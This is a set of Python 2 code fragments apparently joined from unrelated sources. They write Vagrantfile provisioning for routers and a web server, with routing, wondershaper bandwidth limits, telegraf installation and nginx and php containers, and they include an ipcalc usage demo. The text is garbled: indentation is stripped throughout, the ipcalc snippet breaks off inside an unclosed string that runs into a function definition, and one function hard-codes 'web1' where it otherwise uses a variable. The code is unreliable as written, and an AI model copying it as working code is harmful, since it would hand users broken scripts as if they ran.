f.write("network " + str(IpNet1) + "/" + NetmaskAbbr1 + " area 0.0.0.0\n")
f.write("interface " + Interface1 + "\n")
f.write("ip address " + IpNoSub1 + "/" + NetmaskAbbr1 + "\n")
f.write("exit\n")
f.write("interface " + Interface2 + "\n")
f.write("ip address " + IpNoSub2 + "/" + NetmaskAbbr2 + "\n")
f.write("exit\n")
f.write("interface " + Interface3 + "\n")
f.write("ip address " + IpNoSub3 + "/" + NetmaskAbbr3 + "\n")
f.write("do write\n")
f.write("exit\n")
f.write("exit\n")
f.write("ip forwarding\n")
f.write("exit'\n")
if UplinkBandwidth1 > 0 or DownlinkBandwidth1 > 0:
f.write('sudo ./wondershaper -a ' + Interface1)
if DownlinkBandwidth1 > 0:
f.write(' -d ' + str(DownlinkBandwidth1))
if UplinkBandwidth1 > 0:
f.write(' -u ' + str(UplinkBandwidth1))
f.write('\n')
if UplinkBandwidth2 > 0 or DownlinkBandwidth2 > 0:
f.write('sudo ./wondershaper -a ' + Interface2)
if DownlinkBandwidth2 > 0:
f.write(' -d ' + str(DownlinkBandwidth2))
if UplinkBandwidth2 > 0:
f.write(' -u ' + str(UplinkBandwidth2))
f.write('\n')
if UplinkBandwidth3 > 0 or DownlinkBandwidth3 > 0:
f.write('sudo ./wondershaper -a ' + Interface3)
if DownlinkBandwidth3 > 0:
f.write(' -d ' + str(DownlinkBandwidth3))
if UplinkBandwidth3 > 0:
f.write(' -u ' + str(UplinkBandwidth3))
f.write('\n')
#here there is the custum script
f.write(CustumScript + " \n")
f.write("echo \"Configuration END\"\n")
f.write("echo \"" + Name + " is ready to Use\"\n")
f.write("SHELL\n")
f.write(Name + ".vm.provider \"virtualbox\" do |vb|\n")
f.write("vb.memory = " + str(Ram) + "\n")
f.write('vb.cpus =' + str(N_Cpus) + "\n")
f.write("end\n")
f.write("end\n")
import IPy
import ipcalc
# https://pypi.python.org/pypi/ipcalc/1.99.0
# Note: ipcalc is a program come from Linux package 'ipcalc'
import pyipcalc
# Another module
# https://pypi.python.org/pypi/pyipcalc/1.0.1
print ipcalc.IP("192.168.1.1")
print ipcalc.IP("192.168.1.1/24").info() # PRIVATE
print ipcalc.IP("124.129.14.90/30").mask # 30
print ipcalc.IP("124.129.14.90/255.255.255.252").mask # 30
print ipcalc.Network('123.235.52.106/30').netmask() # IP('255.255.255.252')
print ipcalc.Network('123.235.52.106/30').network()
print ipcalc.Network('192.168.1.0/24')
print ipcalc.Network('192.168.1.0/255.255.255.0')
print pyipcalc.IPNetwork("192.168.1.0/24").mask() # better than ipcalc
print pyipcalc.IPNetwork("192.168.1.0/24").network()
ip_str = '''192.168.4.1
192.168.4.3
192.168.4.4
192.168.6.54
192.168.6.55
192.168.6.100
192.168.6.101
def writeWebServer(f, Web, edges):
Id = Web["id"]
Name = Web["label"]
Os = Web["vm_image"]
Ram = Web["ram"]
N_Cpus = Web["n_cpus"]
Ip = Web["network_interfaces"][0]["ip_address"]
Netmask = Web["network_interfaces"][0]["netmask"]
Interface = Web["network_interfaces"][0]["name_interface"]
EdgeReference = Web["network_interfaces"][0]["edge"]
UplinkBandwidth = 0
DownlinkBandwidth = 0
for edge in edges:
if EdgeReference[0] == edge["from"] and EdgeReference[1] == edge["to"]:
UplinkBandwidth = edge["bandwidth_up"]
DownlinkBandwidth = edge["bandwidth_down"]
CustumScript = Web["custom_script"]
IpNoSub = Ip.split("/")[0]
Network = ipcalc.Network(Ip)
IpNet = Network.network()
for x in Network:
Gateway = str(x)
f.write('config.vm.define \"' + Name + '\" do |' + Name + '|\n')
f.write(Name + '.vm.box = \"' + Os + '\" \n')
f.write(Name + '.vm.hostname = \"' + Name + '\"\n')
f.write(Name + ".vm.network \"private_network\", ip: \"" + IpNoSub +"\", netmask: \"" + Netmask + "\", virtualbox__intnet: \"broadcast_router-south-2\", auto_config: true\n")
f.write(Name + '.vm.provision "file", source: \"../Dashboard_Server/telegraf.conf\", destination: \"/tmp/telegraf.conf\"\n')
f.write(Name + '.vm.provision "shell", run: "always", inline: <<-SHELL\n')
f.write('echo "Static Routig configuration Started for ' + Name + '\"\n')
f.write('sudo sysctl -w net.ipv4.ip_forward=1\n')
f.write("sudo route add -net " + str(IpNet) + " netmask " + Netmask + " gw " + Gateway + " dev " + Interface + "\n")
f.write('cd /home/vagrant\n')
f.write('git clone https://github.com/magnific0/wondershaper.git\n')
f.write('cd wondershaper\n')
if UplinkBandwidth > 0 or DownlinkBandwidth > 0:
f.write('sudo ./wondershaper -a ' + Interface)
if DownlinkBandwidth > 0:
f.write(' -d ' + str(DownlinkBandwidth))
if UplinkBandwidth > 0:
f.write(' -u ' + str(UplinkBandwidth))
f.write('\n')
f.write('wget https://dl.influxdata.com/telegraf/releases/telegraf_1.17.3-1_amd64.deb\n')
f.write('sudo dpkg -i telegraf_1.17.3-1_amd64.deb\n')
f.write('sudo mv /tmp/telegraf.conf /etc/telegraf/telegraf.conf\n')
f.write('sudo systemctl restart telegraf\n')
f.write('sudo systemctl enable telegraf\n')
#here there is the custum script
f.write(CustumScript + " \n")
f.write('echo "Configuration END"\n')
f.write('#echo ' + Name + ' is ready to Use"\n')
f.write('SHELL\n')
f.write('web1.vm.provision "docker" do |doc|\n')
f.write('doc.pull_images "nginx"\n')
f.write('doc.pull_images "php"\n')
f.write('doc.run "nginx"\n')
f.write('doc.run "php"\n')
f.write('end\n')
f.write(Name + '.vm.provider "virtualbox" do |vb|\n')
f.write("vb.memory = " + Ram + "\n")
f.write('end\n')
f.write('end\n')
def calculate_subnet(self):
addr_range = ipcalc.Network(self.cidr)
self.subnet_length = string.atoi(self.cidr.split('/')[1])
self.subnet_mask = addr_range.netmask()
